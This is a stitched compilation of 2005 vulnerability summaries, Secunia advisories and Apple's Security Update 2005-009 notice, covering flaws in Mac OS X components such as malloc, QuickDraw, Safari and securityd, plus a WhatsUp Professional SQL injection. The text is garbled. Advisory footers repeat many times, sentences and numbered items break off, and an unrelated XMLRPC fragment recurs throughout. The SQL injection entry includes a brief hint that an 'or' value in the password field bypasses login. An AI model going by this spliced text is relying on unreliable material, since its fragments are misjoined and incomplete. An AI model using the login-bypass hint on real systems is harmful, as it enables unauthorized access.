link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

The malloc function in the libSystem library in Apple Mac OS X 10.3.9 and 10.4.2 allows local users to overwrite arbitrary files by setting the MallocLogFile environment variable to the target file before running a setuid application. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. This issue is due to insecure file handling in the 'malloc()' library for setuid applications. This issue occurs due to insufficient checks in the memory allocation library, leading to local users being able to utilize the debugging features on setuid applications. A local attacker could exploit this vulnerability to create, or append data to arbitrary files with superuser privileges. Depending on the purpose of the modified files, this may cause system crashes, or allow attackers to gain elevated privileges. 1) A boundary error in ImageIO can be exploited to cause a buffer overflow and may allow execution of arbitrary code on a user's system when a specially crafted GIF file is opened e.g. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

Buffer overflow in QuickDraw Manager for Apple OS X 10.3.9 and 10.4.2, as used by applications such as Safari, Mail, and Finder, allows remote attackers to execute arbitrary code via a crafted PICT file. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. QuicDraw is a graphics drawing platform in Apple OS. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

Mail.app in Mail for Apple Mac OS X 10.3.9, when using Kerberos 5 for SMTP authentication, can include uninitialized memory in a message, which might allow remote attackers to obtain sensitive information. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. Mac OS is an operating system that runs on Apple's Macintosh series of computers. 1) A boundary error in ImageIO can be exploited to cause a buffer overflow and may allow execution of arbitrary code on a user's system when a specially crafted GIF file is opened e.g. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

SecurityAgent in Apple Mac OS X 10.4.2, under certain circumstances, can cause the "Switch User..." button to appear even though the "Enable fast user switching" setting is disabled, which can allow attackers with physical access to gain access to the desktop and bypass the "Require password to wake this computer from sleep or screen saver" setting. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. Security Agent is a powerful system security auxiliary tool in the Apple system. 1) A boundary error in ImageIO can be exploited to cause a buffer overflow and may allow execution of arbitrary code on a user's system when a specially crafted GIF file is opened e.g. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

Authorization Services in securityd for Apple Mac OS X 10.3.9 allows local users to gain privileges by granting themselves certain rights that should be restricted to administrators. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. Mac OS is an operating system running on Apple Macintosh series computers. 1) A boundary error in ImageIO can be exploited to cause a buffer overflow and may allow execution of arbitrary code on a user's system when a specially crafted GIF file is opened e.g. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

SQL injection vulnerability in the logon screen of the web front end (NmConsole/Login.asp) for IpSwitch WhatsUp Professional 2005 SP1 allows remote attackers to execute arbitrary SQL commands via the (1) User Name field (sUserName parameter) or (2) Password (sPassword parameter). This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. It should be noted that by supplying a 'or' value through the 'password' parameter, an attacker can gain unauthorized access to an affected site. WhatsUp Professional is a network management solution for SMBs

Heap-based buffer overflow in CoreFoundation in Mac OS X and OS X Server 10.4 through 10.4.3 allows remote attackers to execute arbitrary code via unknown attack vectors involving "validation of URLs.". CoreFoundation is prone to a buffer-overflow vulnerability. The issue presents itself when specially crafted URIs are handled. A successful attack may result in a denial-of-service condition or remote unauthorized access because of arbitrary code execution in the context of the affected application. NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability. For more information: SA14530 2) An error in the Apache web server's "mod_ssl" module may be exploited by malicious people to bypass certain security restrictions. For more information: SA16700 3) A boundary error exists in CoreFoundation when resolving certain URL. 4) An error in curl when handling NTLM authentication can be exploited by malicious people to compromise a user's system. For more information: SA17193 5) An error exists in the ODBC Administrator utility helper tool "iodbcadmintoo". 6) An error in OpenSSL when handling certain compatibility options can potentially be exploited by malicious people to perform protocol rollback attacks. 8) An integer overflow error exists in the PCRE library that is used by Safari's JavaScript engine. This can potentially be exploited by malicious people to compromise a user's system. This can be exploited to cause the download file to be saved outside of the designated download directory. For more information: SA15474 11) A boundary error exists in WebKit when handling certain specially crafted content. For more information: SA15744 13) The syslog server does not properly sanitise messages before recording them. SOLUTION: Apply Security Update 2005-009. ORIGINAL ADVISORY: http://docs.info.apple.com/article.html?artnum=302847 OTHER REFERENCES: SA14530: http://secunia.com/advisories/14530/ SA16700: http://secunia.com/advisories/16700/ SA17193: http://secunia.com/advisories/17193/ SA17151: http://secunia.com/advisories/17151/ SA16502: http://secunia.com/advisories/16502/ SA15474: http://secunia.com/advisories/15474/ SA15744: http://secunia.com/advisories/15744/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2005-11-29 Security Update 2005-009 Security Update 2005-009 is now available and delivers the following security enhancements: Apache2 CVE-ID: CVE-2005-2088 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Cross-site scripting may be possible in certain configurations Description: The Apache 2 web server may allow an attacker to bypass protections using specially-crafted HTTP headers. This behavior is only present when Apache is used in conjunction with certain proxy servers, caching servers, or web application firewalls. This update addresses the issue by incorporating Apache version 2.0.55. Only Apache configurations that include the "SSLVerifyClient require" directive may be affected. This update address the issue by incorporating mod_ssl 2.8.24 and Apache version 2.0.55 (Mac OS X Server). CoreFoundation is used by Safari and other applications. This update addresses the issue by performing additional validation of URLs. This issue does not affect systems prior to Mac OS X v10.4. This may cause a stack buffer overflow and lead to arbitrary code execution. This update addresses the issue by performing additional validation when using NTLM authentication. This issue does not affect systems prior to Mac OS X v10.4. iodbcadmintool CVE-ID: CVE-2005-3700 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Local users may gain elevated privileges Description: The ODBC Administrator utility includes a helper tool called iodbcadmintool that executes with raised privileges. This helper tool contains a vulnerability that may allow local users to execute arbitrary commands with raised privileges. This update addresses the issue by providing an updated iodbcadmintool that is not susceptible. Such attacks may cause an SSL connection to use the SSLv2 protocol which provides less protection than SSLv3 or TLS. Further information on this issue is available at http://www.openssl.org/news/secadv_20051011.txt. This update addresses the issue by incorporating OpenSSL version 0.9.7i. passwordserver CVE-ID: CVE-2005-3701 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Local users on Open Directory master servers may gain elevated privileges Description: When creating an Open Directory master server, credentials may be compromised. This could lead to unprivileged local users gaining elevated privileges on the server. This update addresses the issue by ensuring the credentials are protected. This may lead to the execution of arbitrary code. This update addresses the issue by providing a new version of the JavaScript engine that incorporates more robust input validation. Safari CVE-ID: CVE-2005-3702 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Safari may download files outside of the designated download directory Description: When files are downloaded in Safari they are normally placed in the location specified as the download directory. However, if a web site suggests an overlong filename for a download, it is possible for Safari to create this file in other locations. Although the filename and location of the downloaded file content cannot be directly specified by remote servers, this may still lead to downloading content into locations accessible to other users. This update addresses the issue by rejecting overlong filenames. Safari CVE-ID: CVE-2005-3703 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: JavaScript dialog boxes in Safari may be misleading Description: In Safari, JavaScript dialog boxes do not indicate the web site that created them. This could mislead users into unintentionally disclosing information to a web site. This update addresses the issue by displaying the originating site name in JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research for reporting this issue. This may be triggered by content downloaded from malicious web sites in applications that use WebKit such as Safari. This update addresses the issue by removing the heap overflow from WebKit. Credit to Neil Archibald of Suresec LTD and Marco Mella for reporting this issue. Although the default configuration is not vulnerable to this issue, custom sudo configurations may not properly restrict users. Further information on this issue is available from: http://www.sudo.ws/sudo/alerts/path_race.html This update addresses the issue by incorporating sudo version 1.6.8p9. syslog CVE-ID: CVE-2005-3704 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: System log entries may be forged Description: The system log server records syslog messages verbatim. By supplying control characters such as the newline character, a local attacker could forge entries with the intention to mislead the system administrator. This update addresses the issue by specially handling control characters and other non-printable characters. This issue does not affect systems prior to Mac OS X v10.4. Credit to HELIOS Software GmbH for reporting this issue. Additional Information Also included in this update are enhancements to Safari to improve handling of credit card security codes (Mac OS X v10.3.9 and Mac OS X v10.4.3), CoreTypes to improve handling of Terminal files (Mac OS X v10.4.3), QuickDraw Manager to improve rendering of PICT files (Mac OS X v10.3.9), documentation regarding OpenSSH and PAM (Mac OS X v10.4.3), and ServerMigration to remove unneeded privileges. Security Update 2005-009 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.4.3 The download file is named: "SecUpd2005-009Ti.dmg" Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1 For Mac OS X Server v10.4.3 The download file is named: "SecUpdSrvr2005-009Ti.dmg" Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60 For Mac OS X v10.3.9 The download file is named: "SecUpd2005-009Pan.dmg" Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650 For Mac OS X Server v10.3.9 The download file is named: "SecUpdSrvr2005-009Pan.dmg" Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13 Information will also be posted to the Apple Product Security web site: http://docs.info.apple.com/article.html?artnum=61798 This message is signed with Apple's Product Security PGP key, and details are available at: http://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.1 (Build 2185) iQEVAwUBQ4zotIHaV5ucd/HdAQJiPAf/S7bsLZk3R7I8FBidCKQ/bxSxjhTFx8sK vqsVFNDsXzv+tEa3IP58D8lI8lF94o+50p59qaPWxHzl4HxPVKlH4YCiBesYmVRp FcGo0qbzj5wJzdWADPV+I8O+/CR5k8J35PuKDIzPabnO67nxoXc/DF6go50e5Hr9 Yqs2477ufq0ANd8wG9dF5pfcYwD8KRLfOmfJ9ZVhbG8Up0uO4JH71cTQZIFcKkYf g6N9SCnqx5JqCwsRx85a8WuY1x97K3zqP53/bt4Wzi76VaaSaYj01nVywworTik4 YzOWOckJmWU9+66iby9mKY2mzz+u/vwtiMp577yT4y9FiSg6yp7mWQ== =jnz9 -----END PGP SIGNATURE-----

Safari in Mac OS X and OS X Server 10.3.9 and 10.4.3 allows remote attackers to cause files to be downloaded to locations outside the download directory via a long file name. Safari is prone to a remote directory-traversal vulnerability. The vulnerability presents itself when a user tries to download a file from a remote location and the file name is excessively long. NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability. For more information: SA14530 2) An error in the Apache web server's "mod_ssl" module may be exploited by malicious people to bypass certain security restrictions. For more information: SA16700 3) A boundary error exists in CoreFoundation when resolving certain URL. 4) An error in curl when handling NTLM authentication can be exploited by malicious people to compromise a user's system. For more information: SA17193 5) An error exists in the ODBC Administrator utility helper tool "iodbcadmintoo". 6) An error in OpenSSL when handling certain compatibility options can potentially be exploited by malicious people to perform protocol rollback attacks. 8) An integer overflow error exists in the PCRE library that is used by Safari's JavaScript engine. This can potentially be exploited by malicious people to compromise a user's system. This can be exploited to cause the download file to be saved outside of the designated download directory. For more information: SA15474 11) A boundary error exists in WebKit when handling certain specially crafted content. For more information: SA15744 13) The syslog server does not properly sanitise messages before recording them. SOLUTION: Apply Security Update 2005-009. ORIGINAL ADVISORY: http://docs.info.apple.com/article.html?artnum=302847 OTHER REFERENCES: SA14530: http://secunia.com/advisories/14530/ SA16700: http://secunia.com/advisories/16700/ SA17193: http://secunia.com/advisories/17193/ SA17151: http://secunia.com/advisories/17151/ SA16502: http://secunia.com/advisories/16502/ SA15474: http://secunia.com/advisories/15474/ SA15744: http://secunia.com/advisories/15744/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2005-11-29 Security Update 2005-009 Security Update 2005-009 is now available and delivers the following security enhancements: Apache2 CVE-ID: CVE-2005-2088 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Cross-site scripting may be possible in certain configurations Description: The Apache 2 web server may allow an attacker to bypass protections using specially-crafted HTTP headers. This behavior is only present when Apache is used in conjunction with certain proxy servers, caching servers, or web application firewalls. This update addresses the issue by incorporating Apache version 2.0.55. Only Apache configurations that include the "SSLVerifyClient require" directive may be affected. CoreFoundation CVE-ID: CVE-2005-2757 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Resolving a maliciously-crafted URL may result in crashes or arbitrary code execution Description: By carefully crafting a URL, an attacker can trigger a heap buffer overflow in CoreFoundation which may result in a crash or arbitrary code execution. CoreFoundation is used by Safari and other applications. This update addresses the issue by performing additional validation of URLs. This issue does not affect systems prior to Mac OS X v10.4. curl CVE-ID: CVE-2005-3185 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Visiting a malicious HTTP server and using NTLM authentication may result in arbitrary code execution Description: Using curl with NTLM authentication enabled to download an HTTP resource may allow an attacker to supply an overlong user or domain name. This may cause a stack buffer overflow and lead to arbitrary code execution. This update addresses the issue by performing additional validation when using NTLM authentication. This issue does not affect systems prior to Mac OS X v10.4. This helper tool contains a vulnerability that may allow local users to execute arbitrary commands with raised privileges. This update addresses the issue by providing an updated iodbcadmintool that is not susceptible. Such attacks may cause an SSL connection to use the SSLv2 protocol which provides less protection than SSLv3 or TLS. Further information on this issue is available at http://www.openssl.org/news/secadv_20051011.txt. This update addresses the issue by incorporating OpenSSL version 0.9.7i. This could lead to unprivileged local users gaining elevated privileges on the server. This update addresses the issue by ensuring the credentials are protected. This may lead to the execution of arbitrary code. This update addresses the issue by providing a new version of the JavaScript engine that incorporates more robust input validation. However, if a web site suggests an overlong filename for a download, it is possible for Safari to create this file in other locations. Although the filename and location of the downloaded file content cannot be directly specified by remote servers, this may still lead to downloading content into locations 